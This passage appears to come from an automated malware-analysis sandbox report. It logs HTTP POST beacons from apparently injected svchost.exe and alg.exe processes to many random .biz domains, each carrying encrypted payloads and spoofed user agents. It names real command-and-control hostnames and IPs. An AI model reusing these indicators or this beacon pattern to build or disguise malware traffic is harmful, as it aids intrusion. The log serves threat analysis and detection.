                                                                                                                                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Length: 786
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:40.668987989 CEST786OUTData Raw: 2c c8 3a 87 68 5e db b2 06 03 00 00 d6 50 2c c1 90 3b 0a cf 05 8d 5e 8d 16 61 bf 7c a6 92 5e 0d 9a e8 b3 d8 97 33 51 25 21 18 cd cd d6 9b 58 83 8f 39 d4 f4 e6 cc c0 42 00 7f 3f b7 a0 5c c1 46 5f cf 7e 97 22 56 de a4 85 81 55 5c 4d b1 b9 a4 b7 57
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: ,:h^P,;^a|^3Q%!X9B?\F_~"VU\MWO+|>ZYI:6EaUlcmBK#6HKZk85 `hAj9H{tt!+Ffu#mR=A&$d?G|u$


                                                                                                                                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                              139192.168.2.45018372.52.178.23804476C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:41.204447985 CEST347OUTPOST /ghy HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                              Host: wxgzshna.biz
                                                                                                                                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Length: 786
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:41.204468012 CEST786OUTData Raw: 42 a1 8c 63 06 d1 c8 92 06 03 00 00 92 50 18 83 d8 03 62 03 76 0c c0 7c 74 e9 e8 a8 b7 8d 92 77 34 70 96 23 5a ba 9b 60 a3 6e ec 49 68 05 43 a4 ca ee de 82 1c 4b b7 e8 62 6a 91 b3 14 c2 15 60 fc 1d c3 36 9e 3d d7 96 cb 26 ba f2 85 93 23 f3 c6 3d
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: BcPbv|tw4p#Z`nIhCKbj`6=&#=/qGBhNtR:A1@9P1cwwIy>.dR_H&6[67*e"M/N<D/gf&d{wGM>u_3LAC@4C|bnol@


                                                                                                                                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                              140192.168.2.45018434.246.200.160802912C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:41.534482956 CEST352OUTPOST /fxeavmrosc HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                              Host: pwlqfu.biz
                                                                                                                                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:41.534482956 CEST778OUTData Raw: b9 ec c0 2b a7 a9 34 0e fe 02 00 00 83 a8 7b bb 4d 7c f6 46 a8 47 ea 71 6b f1 f4 77 64 5b 3c 67 a5 49 70 1c fa aa 38 d2 ec d9 72 c3 9a 14 54 95 83 f9 49 00 db 11 61 97 01 27 7d 34 e5 9c 24 20 9a c7 1d 53 5d e1 b9 f3 c1 42 bc cb 0a d3 4a a8 da 60
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: +4{M|FGqkwd[<gIp8rTIa'}4$ S]BJ`"N[qE#%\s?4c(hL&]2sk7wx}:)5igD&UMn69TOdL:IOL)+y\~Yw}>H]\ E0 *c,O[.~Aip
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:42.294289112 CEST408INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                              Date: Tue, 08 Oct 2024 13:29:42 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: btst=bffbdebd195b849e59d10d9f3f09e56b|8.46.123.33|1728394182|1728394182|0|1|0; path=/; domain=.pwlqfu.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: snkz=8.46.123.33; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                              141192.168.2.45018544.221.84.105804476C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:41.791023016 CEST347OUTPOST /hlcxi HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                              Host: zrlssa.biz
                                                                                                                                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Length: 786
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:41.791167021 CEST786OUTData Raw: 5c 9d e1 2f 65 13 06 6c 06 03 00 00 82 4a c7 7d c6 34 ae a1 0f 17 c9 cd 90 f5 60 6b 70 17 c8 95 50 22 02 eb 6e a3 fe 9d 1b 68 d5 b4 7c 8a 0f af 4f 2a 82 95 d3 86 f6 33 73 f3 31 3c da 01 e4 bd 50 5f 74 98 04 c2 e1 3c 4a db c3 6f 9f a9 07 4c 51 0e
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: \/elJ}4`kpP"nh|O*3s1<P_t<JoLQ"H-+(X|/lM-e]4E]pU1*m_<Oc$xA3n1*QVc$BE?<4URV|=6c|H(k.ZMXDB@t
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:42.267083883 CEST408INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                              Date: Tue, 08 Oct 2024 13:29:42 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: btst=7106c483357271d0e2a918f66a95b3ef|8.46.123.33|1728394182|1728394182|0|1|0; path=/; domain=.zrlssa.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: snkz=8.46.123.33; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                              142192.168.2.45018618.141.10.107804476C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:42.294493914 CEST347OUTPOST /og HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                              Host: jlqltsjvh.biz
                                                                                                                                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Length: 786
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:42.294522047 CEST786OUTData Raw: bc 10 2a 49 97 d8 02 71 06 03 00 00 8d 55 c2 11 60 c7 a2 8b 68 26 1a e0 0e 57 5c 54 7b 4d ea 5a 76 55 f3 e5 20 50 99 86 9c f1 68 18 89 52 62 df 64 ce 9c 1e 0c 54 5a 88 8f c4 f1 14 3c ad 5f 40 99 55 a9 e0 a3 30 5e 1e a8 37 a8 90 40 7e 42 f5 f3 c8
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: *IqU`h&W\T{MZvU PhRbdTZ<_@U0^7@~B ;F<:>|HVyB{$(o"G4R -83}8*L *bNc:=jb`+a\T}v1D^(&<E"%v']"?
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:43.871831894 CEST411INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                              Date: Tue, 08 Oct 2024 13:29:43 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: btst=860eb39625ca1eadbb70fae07970cb4a|8.46.123.33|1728394183|1728394183|0|1|0; path=/; domain=.jlqltsjvh.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: snkz=8.46.123.33; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                              143192.168.2.45018847.129.31.212802912C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:42.864852905 CEST359OUTPOST /ohyfmaqfmywges HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                              Host: rrqafepng.biz
                                                                                                                                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:42.864913940 CEST778OUTData Raw: f2 b3 b8 7b a7 f6 04 9a fe 02 00 00 8f 1a 7e b2 75 66 a6 9e 26 cf 09 0b 3b 95 89 e9 33 e6 d2 bb 6b ca 32 fe ed d2 d5 0f 71 fd 60 2b 90 f4 77 02 28 a7 79 8e d9 36 c1 ce 37 ca dc 6d 8e 87 59 ff b0 00 a6 59 40 39 ef 9f 18 0c 2f a2 52 70 b3 43 05 ee
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: {~uf&;3k2q`+w(y67mYY@9/RpC-+Z,&&_HH29~kWIBZ1ur4A{Ll#ri?17<%L^B;ssN/1PJ:m^J@-EE
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:44.190599918 CEST411INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                              Date: Tue, 08 Oct 2024 13:29:43 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: btst=6618638685f77b0b2ee66ed0b03714b8|8.46.123.33|1728394183|1728394183|0|1|0; path=/; domain=.rrqafepng.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: snkz=8.46.123.33; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                              144192.168.2.45018918.208.156.248804476C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:43.895834923 CEST353OUTPOST /mavqlvnkyqsv HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                              Host: xyrgy.biz
                                                                                                                                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Length: 786
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:43.895854950 CEST786OUTData Raw: e4 5d d3 04 26 50 12 40 06 03 00 00 d3 7c 13 df bb d1 d4 15 e1 06 ad 36 b5 49 35 8c 56 67 42 89 64 b7 8d 9e d7 e7 a2 29 bb 5e df f3 8e 28 00 97 e9 1f bb 4b e3 33 41 46 8f f5 0a 9f 27 6c 99 bb 1e da d1 53 07 d9 13 d3 da ba e2 f6 ae 42 c3 b5 19 d1
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: ]&P@|6I5VgBd)^(K3AF'lSBg$pJ9'v6XDUK3eG'{QWGeSsPKoBb8P?;d|qU-E,o.M:Cie2M|4.2+Huvp6C
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:44.365669012 CEST407INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                              Date: Tue, 08 Oct 2024 13:29:44 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: btst=0b5e7fa99caa442c2d0584d651c38bb3|8.46.123.33|1728394184|1728394184|0|1|0; path=/; domain=.xyrgy.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: snkz=8.46.123.33; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                              145192.168.2.450190172.234.222.143804476C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:44.386077881 CEST356OUTPOST /qewfnkeilkg HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                              Host: htwqzczce.biz
                                                                                                                                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Length: 786
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:44.386102915 CEST786OUTData Raw: d5 52 4d 76 5d 70 13 09 06 03 00 00 b0 15 2c de 98 13 0e f1 1a f0 c1 b1 46 97 d8 7c cb a2 4b e0 f3 8c d1 43 2b f1 b8 13 ec 63 09 c7 f1 81 d2 a7 22 62 0e c2 1c 5c 25 e8 6f 75 54 41 59 7b e5 51 f6 0d e0 02 e8 47 16 cf ff 37 81 ad 4e 17 a0 9e 5f 30
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: RMv]p,F|KC+c"b\%ouTAY{QG7N_0Dn3ZA,0QYa8l1V8/T]_j~iaWR<10+h;A}ByQYIce_ahwP2A-:FiYq.."mv|wsy


                                                                                                                                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                              146192.168.2.450191172.234.222.143804476C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:44.905728102 CEST361OUTPOST /rnkfruqdkxfgjfwn HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                              Host: htwqzczce.biz
                                                                                                                                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Length: 786
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:44.905783892 CEST786OUTData Raw: 4f f3 23 2c 71 f8 12 a7 06 03 00 00 ed fb 63 21 6f d2 a2 a7 81 e1 34 cd 4b b0 eb d4 3d 38 03 68 70 a9 53 45 d2 e7 56 6d cc 0b ec 79 77 d0 f0 9e 6f 69 68 2a 8f 20 76 ad e0 21 e2 95 86 76 34 1a c1 7c 1a 7b 23 2b 04 67 7f 44 bf a7 27 00 57 d1 63 6b
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: O#,qc!o4K=8hpSEVmywoih* v!v4|{#+gD'Wck}%P}Km<2]!Cq5MbPH>bCEP\<'l7*C_gu1=4ptJ.lRT%PdL)e+U<Ixv@


                                                                                                                                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                              147192.168.2.4501933.94.10.34802912C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:45.110486031 CEST349OUTPOST /yxaoh HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                              Host: ctdtgwag.biz
                                                                                                                                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:45.110486031 CEST778OUTData Raw: f1 85 67 52 87 f7 ab f4 fe 02 00 00 8a b8 52 5e 17 3a fb 20 6c b0 65 b1 a9 49 30 e6 b1 f4 f6 01 e4 ff df 41 20 e4 65 60 7a a6 a5 c1 90 b5 50 7e 10 a1 de a5 44 f7 21 37 d3 5a e6 13 5b 8c 70 c4 86 8b ec 84 bc b4 22 1b 68 e5 2e 8a e4 3e fa fc 1e 92
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: gRR^: leI0A e`zP~D!7Z[p"h.>F>|~dd-)^>9NtQhL(!ftG9F$k3]Rd(%ghIM>e5{dvNk5|EkjG$@6^
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:45.595979929 CEST410INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                              Date: Tue, 08 Oct 2024 13:29:45 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: btst=84074292b6d4c0b0e18fd1d8a869d102|8.46.123.33|1728394185|1728394185|0|1|0; path=/; domain=.ctdtgwag.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: snkz=8.46.123.33; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                              148192.168.2.45019454.244.188.177804476C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:45.418838978 CEST356OUTPOST /klhalpnmlsyrs HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                              Host: kvbjaur.biz
                                                                                                                                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Length: 786
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:45.418860912 CEST786OUTData Raw: 05 36 61 96 05 00 ed 7f 06 03 00 00 db 0f 70 fe b2 69 3a 00 d5 77 78 55 f2 55 10 bd e8 2c 37 15 b5 6c d3 77 33 94 01 8f 94 6c 90 5c 46 f1 b4 7b af 32 a7 cf 9d 94 ea 07 ce 6e f9 f9 5f 19 71 22 f9 9c 86 4f c8 3a 79 2a 83 7a 28 fd 5d 19 bf 87 ec 1f
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: 6api:wxUU,7lw3l\F{2n_q"O:y*z(]*Oq9@;{lgYU9&?nZQ>bk@3{Y7Y4-~:>v;8APx_|nqAO@y{.b{Xl>
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:46.145565033 CEST409INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                              Date: Tue, 08 Oct 2024 13:29:46 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: btst=844837e563fd897bbaa7207ba3385c2a|8.46.123.33|1728394186|1728394186|0|1|0; path=/; domain=.kvbjaur.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: snkz=8.46.123.33; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                              149192.168.2.45019544.221.84.105804476C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:46.436911106 CEST355OUTPOST /hiqtpnauanelpf HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                              Host: uphca.biz
                                                                                                                                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Length: 786
